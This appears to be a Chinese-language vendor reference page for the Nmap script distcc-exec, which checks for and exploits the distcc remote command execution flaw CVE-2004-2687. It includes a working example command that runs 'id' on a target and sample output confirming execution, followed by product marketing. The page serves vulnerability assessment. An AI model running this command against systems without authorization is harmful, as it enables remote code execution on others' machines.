top of page

Nmap vulns 指令與參數:distcc-cve2004-2687 利用分散式編譯器守護程序 distcc 執行漏洞偵測

指令摘要


這個指令用於檢測和利用分散式編譯器守護程序 distcc 中的一個遠端代碼執行漏洞偵測,遠端代碼執行漏洞偵測表示攻擊者可以透過遠端的方式,在目標系統上執行任意的程式碼,這可能對目標系統造成嚴重的安全風險;該漏洞於2002年被揭露,但由於服務的配置不當,現在中仍然存在這個漏洞。

指令參數


cmd

在遠端伺服器上執行命令的參數,您可以將特定的命令提供給此參數,指令將嘗試在目標伺服器上執行該命令。


vulns.short, vulns.showall

請查閱 vulns 函式庫的文件。

指令範例

nmap -p 3632 <ip> --script distcc-exec   --script-args="distcc-exec.cmd='id'"

指令輸出

PORT      STATE SERVICE
3632/tcp open  distccd
| distcc-exec:
|    VULNERABLE:
|    distcc Daemon Command Execution
|      State: VULNERABLE (Exploitable)
|      IDs:  CVE:CVE-2004-2687
|      Risk factor: High  CVSSv2: 9.3   (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|      Description:
|        Allows executing of arbitrary commands on systems running distccd 3.1   and
|        earlier. The vulnerability is the consequence of weak service   configuration.
|
|      Disclosure date: 2002-02-01
|      Extra information:
|
|      uid=118(distccd) gid=65534(nogroup) groups=65534(nogroup)
|
|      References:
|        https://distcc.github.io/security.html
|        https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|_       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687

作者:

Patrik Karlsson

License: Same as Nmap--See https://nmap.org/book/man-legal.html


隨選即看研討會


延伸閱讀

NetAlly 滲透測試及網路測試總覽 > CyberScope Nmap 滲透測試手持式網路分析儀,整合了 Nmap 功能,為站點存取層提供全面的網路安全風險評估、分析、和報告——包括所有的端點和網路探索、有線與無線網路安全、漏洞評估 (Nmap) 以及網段和配置驗證;IT 人員透過單一工具以及單一介面,即可快速且即時的掌握企業或組織的各種混合式網路環境 (有線、無線、PoE)、各種連網終端裝置的拓樸、架構、設置、網段、效能、直到網路安全評估。

Comments


歡迎 訂閱翔宇科技主題式電子報 >,您將可同步掌握最新的產業新訊以及技術文章。
bottom of page